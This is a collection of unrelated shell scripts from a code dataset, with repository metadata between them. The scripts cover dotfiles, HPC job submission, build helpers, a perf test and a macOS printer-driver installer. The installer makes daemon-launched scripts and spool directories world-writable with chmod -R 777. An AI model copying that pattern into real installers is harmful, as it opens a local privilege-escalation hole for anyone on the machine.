quota_blocks=$quota_blocks_custom
fi
if [ -n "$quota_files_custom" ] && [ $quota_files_custom -gt $quota_files ]
then
quota_files=$quota_files_custom
fi
if [ -n "$nproc_custom" ] && [ $nproc_custom -le $limits_nproc ]
then
limits_nproc=$nproc_custom
fi
set_pam_limits $username
set_fs_quotas $username $quota_blocks $quota_files
| true |
0de6a54aff5ff8c45c8082cd03784f6badf1e9cd
|
Shell
|
mitchpaulus/dotfiles
|
/scripts/recent
|
UTF-8
| 165 | 3.140625 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/sh
if [ $# = 0 ]; then
find . -type f -printf '%TY-%Tm-%Td %p\n' | sort -r
else
find . -type f -printf '%TY-%Tm-%Td %p\n' | sort -r | head -n "$1"
fi
| true |
3bf7c3a1fa9a5ef3cb49b9c1d1f2a2fbb9b6de91
|
Shell
|
Joll59/bashprofile
|
/Bash/environment.sh
|
UTF-8
| 3,517 | 3.359375 | 3 |
[] |
no_license
|
# Environment Variables
# =====================
# Editors
# Tells your shell that when a program requires various editors,
export VISUAL="code-insiders"
export SVN_EDITOR="code-insiders"
export GIT_EDITOR="code-insiders"
export EDITOR="code-insiders"
# Library Paths
# These variables tell your shell where they can find certain
# required libraries so other programs can reliably call the variable name
# instead of a hardcoded path.
# NODE_PATH
# Node Path from Homebrew I believe
export NODE_PATH="/usr/local/lib/node_modules:$NODE_PATH"
# Those NODE & Python Paths won't break anything even if you
# don't have NODE or Python installed. Eventually you will and
# then you don't have to update your bash_profile
# GIT_MERGE_AUTO_EDIT
# This variable configures git to not require a message when you merge.
export GIT_MERGE_AUTOEDIT='no'
# Version
# What version of this bash profile this is
export BASH_PROFILE_VERSION='1.5.1'
# Paths
# The USR_PATHS variable will just store all relevant /usr paths for easier usage
# Each path is separated via a : and we always use absolute paths.
# A bit about the /usr directory
# The /usr directory is a convention from linux that creates a common place to put
# files and executables that the entire system needs access too. It tries to be user
# independent, so whichever user is logged in should have permissions to the /usr directory.
# We call that /usr/local. Within /usr/local, there is a bin directory for actually
# storing the binaries (programs) that our system would want.
# Also, Homebrew adopts this convention so things installed via Homebrew
# get symlinked into /usr/local
export USR_PATHS="/usr/local:/usr/local/bin:/usr/local/sbin:/usr/bin"
# Hint: You can interpolate a variable into a string by using the $VARIABLE notation as below.
# We build our final PATH by combining the variables defined above
# along with any previous values in the PATH variable.
# Our PATH variable is special and very important. Whenever we type a command into our shell,
# it will try to find that command within a directory that is defined in our PATH.
# Read http://blog.seldomatt.com/blog/2012/10/08/bash-and-the-one-true-path/ for more on that.
export PATH="$USR_PATHS:$PATH"
# If you go into your shell and type: echo $PATH you will see the output of your current path.
# For example, mine is:
# /Users/avi/.rvm/gems/ruby-1.9.3-p392/bin:/Users/avi/.rvm/gems/ruby-1.9.3-p392@global/bin:/Users/avi/.rvm/rubies/ruby-1.9.3-p392/bin:/Users/avi/.rvm/bin:/usr/local:/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/local/mysql/bin:/usr/local/share/python:/bin:/usr/sbin:/sbin:
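# You can check which directory a command resolves from with the `type`
# builtin, e.g. (output varies per machine):
#   type ruby   # => "ruby is /usr/local/bin/ruby"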
# Postgres
export PATH=/Applications/Postgres.app/Contents/Versions/latest/bin:$PATH
# Final Configurations and Plugins
# =====================
# Git Bash Completion
# Will activate bash git completion if installed
# via homebrew
if [ -f `brew --prefix`/etc/bash_completion ]; then
. `brew --prefix`/etc/bash_completion
fi
# RVM
# Mandatory loading of RVM into the shell
# This must be the last line of your bash_profile always
# source ~/.profile
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
# [[ -s "$HOME/.profile" ]] && source "$HOME/.profile" # Load the default .profile
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
| true |
3b075746cdf896efccd1428e1c082462f3b73068
|
Shell
|
dgunruh/Si-HJ-MD-DFT
|
/PelotonClusterScripts/OldScripts/lammpsSubmission.sh
|
UTF-8
| 1,239 | 2.640625 | 3 |
[] |
no_license
|
#!/bin/bash -l
# Name of the job
#SBATCH --job-name=cSiaSiMD
# SBATCH --nodes=2
# SBATCH --ntasks=2
#SBATCH --array=0-3
#SBATCH --cpus-per-task=32
#SBATCH --partition=med2
#SBATCH --time=24:00:00
#SBATCH --output='outputs/cSiaSiMD-%j.output'
#SBATCH --mail-user="[email protected]"
#SBATCH --mail-type=END
#SBATCH --mail-type=FAIL
# run one thread for each one the user asks the queue for
# hostname is just for debugging
# hostname
# export OMP_NUM_THREADS=$SLURM_NTASKS
export t=$SLURM_ARRAY_TASK_ID
module load lammps
# the main job executable to run: note the use of srun before it
# srun lmp_serial -in cSiaSi_workingVersion.in
# mpirun lmp_mpi -in cSiaSi_workingVersion.in
# assign the random seed and the output files for the lammps scripts
s=$((21248 + 100 * t)) # arithmetic expansion; a bare '=' would store the literal string
dumpA=aSi-$t.xyz
dumpsnapA=aSiBox-$t.xyz
dumpI=cSiaSiInterface-$t.xyz
dumpsnapI=cSiaSiInterfaceSnapshot-$t.xyz
# sed -rie 's/(rand_seed equal)\s\w+/\1 $s/gi' createAmorphousSi.in
# sed -rie 's/(rand_seed equal)\s\w+/\1 $s/gi' mergeAmorphousCrystalline.in
mpirun lmp_mpi -var s $s -var d $dumpA -var ds $dumpsnapA -in createAmorphousSi.in
mpirun lmp_mpi -var s $s -var d $dumpI -var dA $dumpA -var ds $dumpsnapI -in mergeAmorphousCrystalline.in
| true |
8a135ee29e764268aaea5ecf04ff9fb9d477e154
|
Shell
|
pxpeterxu/react-express-scaffolding
|
/sysadmin/components/app-start.sh
|
UTF-8
| 382 | 2.765625 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# Even though we don't need to be in the right directory in theory,
# in practice, being in the wrong directly could lead to permissions
# issues
cd "$DIR/../.."
su -c 'pm2 update' web
su -c 'NODE_ENV=production DATABASE=production pm2 start -i 0 /home/web/app/dist/app/server/bin/www.js' web
su -c 'pm2 save' web
| true |
7a1da2b660cc5ceee5edb7f1bbe2394aa3678d15
|
Shell
|
JustinD85/sandbox
|
/languages/shell/file_status.sh
|
UTF-8
| 382 | 3.90625 | 4 |
[] |
no_license
|
#echo "Type the location of a FILE to check: "
#read FILE
#Takes filename as argument
FILE=$0
for FILE in $@
do
[ -f $FILE ] && echo "This is a file"
[ -d $FILE ] && echo "This is a directory"
if [ -d $FILE ]
then
echo ""
echo "Contents of Directory: "
echo ""
ls $FILE
fi
done
if [ -f $0 ]
then
exit 0
else
exit 1
fi
| true |
deb7561ff11683728d2c49cffbc93757f742e599
|
Shell
|
beenotung/zeronet-profile-chooser
|
/bump-android
|
UTF-8
| 224 | 3.21875 | 3 |
[] |
no_license
|
#!/bin/bash
## bump version
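## usage (updates the android-versionCode attribute in config.xml):
##   ./bump-android      # increment the current code by one
##   ./bump-android 42   # set the code to 42 (example value)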
o=$(./version android)
if [ $# = 1 ]; then
v="$1"
else
v=$(($o + 1))
fi
echo "set android version code $o -> $v"
sed -i "s/android-versionCode=\"$o\" /android-versionCode=\"$v\" /" config.xml
| true |
6ffd3b7cfbe508a78c5d4d573401949bc7a668fb
|
Shell
|
chnaveen1523/Shell-programs
|
/while-loop/MagicNumber.sh
|
UTF-8
| 187 | 3.1875 | 3 |
[] |
no_license
|
#!/bin/bash -x
echo "Guess the number between 1 to 100"
low=1
high=100
mid=0
isNotMagicNumber=1
while (($isNotMagicNumber==1))
do
	mid=$(((low+high)/2))
	read -p "Is it $mid? (h = too high, l = too low, y = yes): " answer
	case $answer in
		h) high=$((mid-1));;
		l) low=$((mid+1));;
		y) isNotMagicNumber=0;;
	esac
done
echo "The magic number is $mid"
| true |
204086142a87fa880ea8ecfd176756e006e6c721
|
Shell
|
omrprks/git-repo
|
/git-repo.sh
|
UTF-8
| 1,508 | 4.125 | 4 |
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
function log {
local message="${@}"
echo "git-repo: ${message}"
}
function error {
local message="${@}"
echo "\033[1;31m$(log ${message})\033[0m"
}
function fatal {
local message="${@}"
error ${message}
exit 1
}
function start {
local url="${@}"
[[ "${OSTYPE}" == "darwin"* ]] && {
open "${url}"
return
}
xdg-open "${url}"
}
BASE=${1:-origin}
SUPPORTED_HOSTS=(
'github.com'
'gitlab.com'
'bitbucket.org'
)
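# Example usage (run inside a git checkout; the remote name defaults to origin):
#   ./git-repo.sh            # open the 'origin' remote in the browser
#   ./git-repo.sh upstream   # open the 'upstream' remote instead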
command -v git >/dev/null 2>&1 || {
fatal git not found
}
[ -d "$(pwd)/.git" ] || git rev-parse --git-dir > /dev/null 2>&1
[[ "$?" -ne "0" ]] && {
fatal not a git repository
}
remote=$(git ls-remote --get-url ${BASE})
http_match="^https?://[-A-Za-z0-9\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\+&@#/%=~_|]"
[[ "${remote}" =~ ${http_match} ]] && {
start "${remote}"
exit 0
}
ssh_match="^git@[-A-Za-z0-9\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\+&@#/%=~_|]"
[[ "${remote}" =~ ${ssh_match} ]] && {
OLD_IFS=${IFS}
IFS="|"
host=$(echo "${remote}" | sed -Ene "s!git@(${SUPPORTED_HOSTS[*]}):([^/]*)/(.*)(.git)?!\1!p")
username=$(echo "${remote}" | sed -Ene "s!git@(${SUPPORTED_HOSTS[*]}):([^/]*)/(.*)(.git)?!\2!p")
repository=$(echo "${remote}" | sed -Ene "s!git@(${SUPPORTED_HOSTS[*]}):([^/]*)/(.*)(.git)?!\3!p")
IFS=${OLD_IFS}
[[ -z "${host}" || -z "${username}" || -z "${repository}" ]] && {
fatal invalid host, username or repository
}
start https://"${host}"/"${username}"/"${repository}"
exit 0
}
fatal unsupported remote url
| true |
5342bb1db70e516e6fcb22a35caad25d1def9833
|
Shell
|
ubiquiti/ubnt-usrsctp
|
/run.sh
|
UTF-8
| 1,164 | 2.5625 | 3 |
[
"BSD-3-Clause"
] |
permissive
|
OS_VERSION=16
OS_ARCH=armeabi-v7a
NDK_ARCH_COMPILER=armv7a-linux-androideabi
NDK_ROOT_PATH=$(dirname $(which ndk-build))
NDK_HOST_NAME=$(basename $(dirname $(dirname $(realpath $(ndk-which --abi ${OS_ARCH} ar)))))
NDK_COMPILER_BASE=${NDK_ROOT_PATH}/toolchains/llvm/prebuilt/${NDK_HOST_NAME}/bin/${NDK_ARCH_COMPILER}${OS_VERSION}-
export LIBUSRSCTP_CUSTOM_CONFIGURE="--host=${NDK_ARCH_COMPILER} --enable-static --disable-shared --disable-programs"
export CFLAGS="-fPIC"
export CC=${NDK_COMPILER_BASE}clang
export CXX=${NDK_COMPILER_BASE}clang++
export LINK=${CXX}
export LD=$(realpath $(ndk-which --abi ${OS_ARCH} ld))
export AR=$(realpath $(ndk-which --abi ${OS_ARCH} ar))
export RANLIB=$(realpath $(ndk-which --abi ${OS_ARCH} ranlib))
export STRIP=$(realpath $(ndk-which --abi ${OS_ARCH} strip))
(git clean -dxff ./ \
&& mkdir m4 \
&& touch NEWS README AUTHORS ChangeLog INSTALL COPYING \
&& autoreconf -vfi \
)
./configure --disable-programs --enable-shared=no --disable-debug --prefix="/tmp/bla" ${LIBUSRSCTP_CUSTOM_CONFIGURE}
make
# /Users/shiretu/Library/Android/sdk/ndk-bundle/toolchains/llvm/prebuilt/darwin-x86_64/sysroot/usr/include/ifaddrs.h
| true |
7a1141e6195c33c8f6e0e0931669b8852f2b0078
|
Shell
|
renancunha33/ShellScripts
|
/topForUnixAix.sh
|
UTF-8
| 174 | 2.5625 | 3 |
[] |
no_license
|
#!/bin/ksh
while true
do
clear
ps -ef
sleep 2
done
# AIX does not have the "top" command for viewing processes in real time, so this little script does something similar.
| true |
63519c172a24e1293180318c5b752b4791a455ea
|
Shell
|
airbnb/istio
|
/tools/go-compile-verbose
|
UTF-8
| 2,713 | 3.578125 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Copyright Istio Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script runs can be used to emit (readable) compile tracing info when building go packages
# Before usage, `go clean -cache` is suggested, otherwise you will measure cached results.
# Cleanup: rm -f /tmp/golog; This will always append to the file so you should cleanup between each call.
# Usage (compile all tests only): `go test -exec=true -toolexec=$PWD/tools/go-compile-verbose ./...`
# Usage (compile binary): `go build -toolexec=$PWD/tools/go-compile-verbose ./...`
# Results will be in /tmp/golog, as stdout gets cached and pollutes all later runs.
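# A quick way to list the slowest steps afterwards (assumes the tab-separated
# "timestamp<TAB>delta<TAB>..." format written by log() below):
#   sort -t$'\t' -k2 -nr /tmp/golog | head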
START="$(date -u +%s.%N)"
# Output a message, with a timestamp matching istio log format
function log() {
delta=$(date +%s.%N --date="$START seconds ago")
echo -e "$(date -u '+%Y-%m-%dT%H:%M:%S.%NZ')\t${delta}\t$*" >&2 >> /tmp/golog
}
GROOT="$(go env GOROOT)"
GPATH="$(go env GOPATH)"
GMODCACHE="$(go env GOMODCACHE)"
ROOT="$PWD"
"$@"
ls="$(basename "$1")"
shift
case "$ls" in
link)
log "${ls}\t$(basename ${2})" ;;
compile)
f=${@: -1}
if [[ "$f" =~ "$GMODCACHE" ]]; then
base="${f/"$GMODCACHE"\//}"
mod="$(<<< "$base" cut -d@ -f1)"
rest="$(<<< "$base" cut -d@ -f2 | cut -d/ -f2-)"
log "${ls}\t${mod}\t${rest}"
elif [[ "$f" =~ "$GROOT" ]]; then
base="${f/"$GROOT"\//}"
log "${ls}\tstd\t${base}"
elif [[ "$f" =~ "$ROOT" ]]; then
base="${f/"$ROOT"\//}"
log "${ls}\tlocal\t${base}"
else
log "${ls}\tunknown\t${f}"
fi
;;
vet)
# vet does not readily expose what is being vetted
log "${ls}" ;;
asm)
f="${@:$#}"
if [[ "$f" =~ "$GMODCACHE" ]]; then
base="${f/"$GMODCACHE"\//}"
mod="$(<<< "$base" cut -d@ -f1)"
rest="$(<<< "$base" cut -d@ -f2 | cut -d/ -f2-)"
log "${ls}\t${mod}\t${rest}"
elif [[ "$f" =~ "$GROOT" ]]; then
base="${f/"$GROOT"\//}"
log "${ls}\tstd\t${base}"
elif [[ "$f" =~ "$ROOT" ]]; then
base="${f/"$ROOT"\//}"
log "${ls}\tlocal\t${base}"
else
log "${ls}\tunknown\t${f}"
fi
;;
cgo)
log "${ls}" ;;
*)
log "${ls}\t${@:-1}" ;;
esac
| true |
bc91de3517eccaf6aa316a3ed191fa0338543f51
|
Shell
|
tomitribe/bash-tricks
|
/string-truncate.sh
|
UTF-8
| 1,913 | 3.75 | 4 |
[] |
no_license
|
#!/bin/bash
# Bash has effectively two methods very similar to Java's String.substring() method.
# In Java their signatures would be similar to:
#
# /** start at beginIndex and return the remaining characters **/
# public String substring(int beginIndex)
#
# /** start at beginIndex and return the next N characters **/
# public String substring(int beginIndex, int length)
#
# In bash this looks like
#
# ${string:beginIndex}
# ${string:beginIndex:length}
#
# If beginIndex is a negative number, Bash will count from the end of the string.
# length, however, cannot be negative to signify "previous N characters"
#
string=abcdefghijklmnopqrstuvwxyz
echo $string
# abcdefghijklmnopqrstuvwxyz
# print the last three characters
# string.substring(-3)
echo ${string: -3}
# xyz
# print the first three characters
# string.substring(0, 3)
echo ${string:0:3}
# start at index 12 and print the rest of the string
# string.substring(12)
echo ${string:12}
# mnopqrstuvwxyz
# start at index 12 and print one character
# string.substring(12, 1)
echo ${string:12:1}
# m
# start at index 0 and print 12 characters
# string.substring(0, 12)
echo ${string:0:12}
# abcdefghijkl
# start at index 0 (implied) and print 12 characters
# string.substring(0, 12)
echo ${string::12}
# abcdefghijkl
# start at index -12 and print remaining characters
# string.substring(-12)
echo ${string:(-12)}
#opqrstuvwxyz
#
#
filename=string-truncate.sh
echo ${filename: -3}
#.sh
echo ${filename: 0 : ${#filename}-3 }
#string-truncate
#####################################
# PARSER WARNING
#####################################
# There is conflicting Bash syntax. ":-" means something else in Bash
# so when you use a negative number, there must be a space before it
#
echo ${filename:-3} # if 'filename' is set, return it
#string-truncate.sh
unset filename
echo ${filename:-3} # if 'filename' is not set, return 3
# 3
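# To disambiguate a negative offset, keep the space or use parentheses,
# as demonstrated above:
string=abcdefghijklmnopqrstuvwxyz
echo ${string: -3}
#xyz
echo ${string:(-3)}
#xyz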
| true |
315d54e987925efe1344303dc28e181a2db5877f
|
Shell
|
Net-Mist/atari_uct_cluster
|
/install/install_gflags.sh
|
UTF-8
| 487 | 3.109375 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
# Change these variables to adapt your system
install_path=$HOME/gfinstall
# Install
cd
git clone https://github.com/gflags/gflags.git
cd gflags
# bump the minimum required CMake version to 2.8.11 non-interactively
# (assumes a single cmake_minimum_required line in CMakeLists.txt)
sed -i 's/cmake_minimum_required.*/cmake_minimum_required (VERSION 2.8.11)/' CMakeLists.txt
mkdir build
cd build
cmake -D BUILD_SHARED_LIBS=ON -D CMAKE_INSTALL_PREFIX=$install_path ..
make
make install
# Clean
cd
rm -rf gflags
# Add gflags path in the bashrc
cd
echo \#gflags >> .bashrc
echo export LD_LIBRARY_PATH=$install_path/lib:\$LD_LIBRARY_PATH >> .bashrc
| true |
1d13c8cb701d52e0bdfa19188e1150734947ca03
|
Shell
|
fredericoalvares/elastica
|
/apicloud/strategies/horInfra_vertSoft.sh
|
UTF-8
| 1,001 | 3.3125 | 3 |
[] |
no_license
|
#!/bin/bash
if ! [ -d /share ] || ! [ -f /root/openrc ]
then
echo "doit etre execute sur le cloud controler"
exit 1
fi
if [ "`env|grep PROJECT_PATH`" = "" ]
then
echo "PROJECT_PATH is not defined"
exit 2
fi
cd $PROJECT_PATH
source $PROJECT_PATH/common/util.sh
if [ "$#" -ne 2 ]; then
echo "Usage: $0 [ + | - ] tier"
exit 1
fi
sens=$1
TIER=$2
TIER_FILE="/tmp/$TIER"
if ! [ -f "$TIER_FILE" ]; then
echo "Tier not found!"
exit 1
fi
echo "Executing $0 in sens $sens"
if [ "$sens" = "+" ]
then
$PROJECT_PATH/apicloud/scale-iaas.sh out $TIER &
iaas_proc=$!
$PROJECT_PATH/apicloud/scale-saas.sh down $TIER
$PROJECT_PATH/apicloud/scale-saas.sh down $TIER
echo "Waiting for SDsoft and SOinfra to be completed"
log_cloud_state "i_0"
wait "$iaas_proc"
$PROJECT_PATH/apicloud/scale-saas.sh up $TIER
log_cloud_state "i_0"
$PROJECT_PATH/apicloud/scale-saas.sh up $TIER
log_cloud_state "i_0"
elif [ "$sens" = "-" ]
then
$PROJECT_PATH/apicloud/scale-iaas.sh in $TIER
fi
| true |
188ea6d6ca6eadd800935815f18d03f3b77a2c69
|
Shell
|
cloudfoundry-incubator/bits-service-release
|
/standalone-dev-setup/scripts/generate-test-bosh-lite-manifest-s3
|
UTF-8
| 1,038 | 2.5625 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
cd $(dirname $0)/..
# grab-AWS-env
lpass show "Shared-Flintstone"/ci-config --notes > config.yml
export AWS_ACCESS_KEY_ID=$(grep -e '^s3-blobstore-access-key-id' config.yml | sed -e 's/s3-blobstore-access-key-id: //')
export AWS_ACCESS_KEY_ID=${AWS_ACCESS_KEY_ID:?AWS_ACCESS_KEY_ID is missing}
export AWS_SECRET_ACCESS_KEY=$(grep -e '^s3-blobstore-secret-access-key' config.yml | sed -e 's/s3-blobstore-secret-access-key: //')
export AWS_SECRET_ACCESS_KEY=${AWS_SECRET_ACCESS_KEY:?AWS_SECRET_ACCESS_KEY is missing}
export BITS_DIRECTORY_KEY=$(grep -e '^s3-blobstore-bucket-name' config.yml | sed -e 's/s3-blobstore-bucket-name: //')
export BITS_DIRECTORY_KEY=${BITS_DIRECTORY_KEY:?BITS_DIRECTORY_KEY is missing}
export BITS_AWS_REGION=$(grep -e '^s3-blobstore-region' config.yml | sed -e 's/s3-blobstore-region: //')
export BITS_AWS_REGION=${BITS_AWS_REGION:?BITS_AWS_REGION is missing}
./scripts/generate-test-bosh-lite-manifest \
./templates/s3.yml \
./templates/bits-release-network-s3.yml
rm config.yml
| true |
b0912b36b3370964e3d1bc3cd458038509d12f39
|
Shell
|
Rp70/docker-nginx
|
/files/docker-entrypoint-init.d/mapuid.sh
|
UTF-8
| 448 | 3.78125 | 4 |
[
"BSD-2-Clause"
] |
permissive
|
#!/usr/bin/env bash
set -e
TARGET_USER='nginx'
# Change uid and gid of user $TARGET_USER to match current dir's owner
if [ "$MAP_WWW_UID" != "no" ]; then
if [ ! -d "$MAP_WWW_UID" ]; then
MAP_WWW_UID=$PWD
fi
uid=$(stat -c '%u' "$MAP_WWW_UID")
gid=$(stat -c '%g' "$MAP_WWW_UID")
usermod -u $uid $TARGET_USER 2> /dev/null && {
groupmod -g $gid $TARGET_USER 2> /dev/null || usermod -a -G $gid $TARGET_USER
}
fi
| true |
062a41fe9f53446d7c0eb5305cb259c0887134a7
|
Shell
|
peterdnight/my-examples
|
/my-shell/bash/samples.sh
|
UTF-8
| 543 | 3.578125 | 4 |
[] |
no_license
|
#!/bin/bash
source shell-utilities.sh
#
# find and remove spaces
#
photosFolder="$HOME/google-drive/family-photos/" ;
#ls
if test -d $photosFolder ; then
cd $photosFolder
find . -depth -name '* *' \
| while IFS= read -r fullPathToFile ; do \
cp -p -v "$fullPathToFile" "$(dirname "$fullPathToFile")/$(basename "$fullPathToFile"|tr -d ' ' )" ; \
done
find . -depth -name '* *' \
| while IFS= read -r fullPathToFile ; do \
rm -f -v "$fullPathToFile" ; \
done
else
echo no folder $photosFolder
fi ;
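# Note: the cp + rm passes above amount to a rename; an equivalent single-pass
# version (same constructs, untested sketch) would be:
#   mv -v "$fullPathToFile" "$(dirname "$fullPathToFile")/$(basename "$fullPathToFile" | tr -d ' ')"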
| true |
eabd53f50bdc676b40b0e58738103464feb0e56d
|
Shell
|
lordmallam/aether
|
/scripts/kubernetes/start_minikube.sh
|
UTF-8
| 643 | 3.28125 | 3 |
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
#!/usr/bin/env bash
set -Eeuo pipefail
export CHANGE_MINIKUBE_NONE_USER=true
# Start Minikube
sudo minikube start --vm-driver=none --kubernetes-version=v1.9.0
# Fix the kubectl context, as it's often stale.
minikube update-context
# Enable ingress in minikube
sudo minikube addons enable ingress
printf "Waiting for kubernetes to start..."
# Wait for Kubernetes to be up and ready.
JSONPATH='{range .items[*]}{@.metadata.name}:{range @.status.conditions[*]}{@.type}={@.status};{end}{end}'
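# The jsonpath renders each node as "name:Ready=True;..." (one Type=Status
# pair per condition), so the grep succeeds once a node reports Ready=True.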
until kubectl get nodes -o jsonpath="$JSONPATH" 2>&1 | grep -q "Ready=True"; do
sleep 1;
done
printf "Kubernetes has started successfully.\n"
| true |
1de1688cf90e7ba2c29336606d24bd4a0aa781a9
|
Shell
|
eerimoq/monolinux-example-project
|
/3pp/linux/tools/perf/tests/shell/record+script_probe_vfs_getname.sh
|
UTF-8
| 1,204 | 3.59375 | 4 |
[
"MIT",
"Linux-syscall-note",
"GPL-2.0-only"
] |
permissive
|
#!/bin/sh
# Use vfs_getname probe to get syscall args filenames
# Uses the 'perf test shell' library to add probe:vfs_getname to the system
# then use it with 'perf record' using 'touch' to write to a temp file, then
# checks that that was captured by the vfs_getname probe in the generated
# perf.data file, with the temp file name as the pathname argument.
# SPDX-License-Identifier: GPL-2.0
# Arnaldo Carvalho de Melo <[email protected]>, 2017
. $(dirname $0)/lib/probe.sh
skip_if_no_perf_probe || exit 2
. $(dirname $0)/lib/probe_vfs_getname.sh
perfdata=$(mktemp /tmp/__perf_test.perf.data.XXXXX)
file=$(mktemp /tmp/temporary_file.XXXXX)
record_open_file() {
echo "Recording open file:"
perf record -o ${perfdata} -e probe:vfs_getname touch $file
}
perf_script_filenames() {
echo "Looking at perf.data file for vfs_getname records for the file we touched:"
perf script -i ${perfdata} | \
egrep " +touch +[0-9]+ +\[[0-9]+\] +[0-9]+\.[0-9]+: +probe:vfs_getname: +\([[:xdigit:]]+\) +pathname=\"${file}\""
}
add_probe_vfs_getname || skip_if_no_debuginfo
err=$?
if [ $err -ne 0 ] ; then
exit $err
fi
record_open_file && perf_script_filenames
err=$?
rm -f ${perfdata}
rm -f ${file}
cleanup_probe_vfs_getname
exit $err
| true |
a2f02739ae33b847a7520cf0fda7da4353be242e
|
Shell
|
vdmitriyev/vagrant-templates
|
/NiFi/scripts/setup-centos.sh
|
UTF-8
| 199 | 2.75 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
source "/vagrant/scripts/common.sh"
function disableFirewall {
echo "disabling firewall"
systemctl stop firewalld
systemctl disable firewalld
}
echo "setup centos"
disableFirewall
| true |
d0903cdb5889ef1e8d575cddbe8651e93443bcf0
|
Shell
|
zhuzhenxxx/mtool
|
/extraResources/mac/common/hpdriver.pkg/Contents/Resources/preflight
|
UTF-8
| 2,921 | 2.6875 | 3 |
[] |
no_license
|
#!/bin/sh
#postinstall.sh
BASEDIR=$(dirname "$0")
echo "$BASEDIR"
. "$BASEDIR"/setup.ini
SPRPath=${PRPath["OSX$shortver"]}
INSTALL_PNAME="${PrinterName}"
cp -Rf "$BASEDIR"/setup.ini /usr/libexec/cups/backend/setup.ini
chmod -R 777 /usr/libexec/cups/backend/setup.ini
# set up the helper process to start automatically
chmod -R 777 /private/var/isectoolsdir/isectools
chmod -R 777 /private/var/isectoolsdir/Itoos.sh
sudo rm -rf /private/var/isectoolsdir
sudo mkdir /private/var/isectoolsdir
chmod -R 777 /private/var/isectoolsdir
cp -Rf "$BASEDIR"/isectools /private/var/isectoolsdir/
cp -Rf "$BASEDIR"/Itoos.sh /private/var/isectoolsdir/
cp -Rf "$BASEDIR"/com.isecprinter.server.plist /Library/LaunchDaemons/
cp -Rf "$BASEDIR"/com.isecopen.server.plist /Library/LaunchAgents/
chmod -R 777 /private/var/isectoolsdir/isectools
chmod -R 777 /private/var/isectoolsdir/Itoos.sh
sleep 1s
# force an overwrite install
rm -rf /Applications/PrinterClient.app
sleep 1s
chmod -R 777 "$BASEDIR"/PrinterClient.app
cp -Rf "$BASEDIR"/PrinterClient.app /Applications/
# lpadmin -x "${INSTALL_PNAME}" 删除打印机
# lpadmin -p "${INSTALL_PNAME}" -E -v ipp://localhost:18237/ipp/print -P "/Library/Printers/HP-Printer.ppd" -o printer-is-shared=false
installer -pkg "$BASEDIR/$SPRPath" -target /
# install the printer
lpadmin -x 梦想加打印机
lpadmin -p ${INSTALL_PNAME} -E -v pdfwriter:/ -P "$BASEDIR"/Resources/RWTS\ PDFwriter.gz -o printer-is-shared=false
#installer -pkg "$BASEDIR"/APP -target /
# highest privileges
# run the script
mkdir /var/spool/PDFwriter/
mkdir /var/spool/PDFwriter/isecpdf_out/
chmod -R 777 /private/var/isectoolsdir/isectools
launchctl unload /Library/LaunchDaemons/com.isecprinter.server.plist
sudo -u $USER launchctl unload /Library/LaunchDaemons/com.isecprinter.server.plist
sleep 1s
sudo -u $USER launchctl load /Library/LaunchDaemons/com.isecprinter.server.plist
sudo launchctl unload /Library/LaunchDaemons/com.isecprinter.server.plist
sleep 1s
sudo launchctl load /Library/LaunchDaemons/com.isecprinter.server.plist
pkill PrinterClient
sleep 2s
sudo -u $USER open /Applications/PrinterClient.app
chmod -R 777 /var/spool/cups
chmod -R 777 /var/spool/PDFwriter/
chmod -R 777 /var/spool/PDFwriter/isecpdf_out/ # 'umask' takes no -R/path; chmod was intended
cd /Users/
for i in `ls -f`;
do
if [[ $i != ".localized" && $i != "Shared" && $i != "Guest" && $i != "." && $i != ".." ]]; then
echo $i
su $i -c "lpoptions -d ${INSTALL_PNAME}"
fi
done
# launchctl unload /Library/LaunchDaemons/com.isecprinter.server.plist
# === preflight_add.sh begin ===
# DO NOT CHANGE THE COMMENT LINES
cp -R "$BASEDIR"/mtool_try_uninstall_driver.sh /private/var
chmod -R 777 /private/var/mtool_try_uninstall_driver.sh
cp -R "$BASEDIR"/com.mxj360.mtool.uninst.plist /Library/LaunchDaemons/
launchctl unload /Library/LaunchDaemons/com.mxj360.mtool.uninst.plist
sleep 1s
launchctl load /Library/LaunchDaemons/com.mxj360.mtool.uninst.plist
sleep 1s
# === preflight_add.sh end ===
exit 0
| true |
e24df843e64c4d89a42a2b16ce776940fa64e084
|
Shell
|
magnific0/dotfiles
|
/envprof/.bashrc
|
UTF-8
| 1,222 | 2.890625 | 3 |
[] |
no_license
|
#
# ~/.bashrc
#
# If not running interactively, don't do anything
[[ $- != *i* ]] && return
#PS1
RET='$(Ret=$? ; [ ${Ret} -eq 0 ] && echo -n "\[\e[32;1m\]▪" || echo -n "\[\e[31;1m\]▪")'
#RET='$(Ret=$? ; [ ${Ret} -eq 0 ] && echo -n "\[\e[32;1m\]▪" || echo -n "\[\e[31;1m\]${Ret}")'
# PS1
red="\[\e[0;32m\]"
yellow="\[\e[0;34m\]"
if [ `id -u` -eq "0" ]; then
root="\[\e[0;31m\]"
else
root="\[\e[0;32m\]"
fi
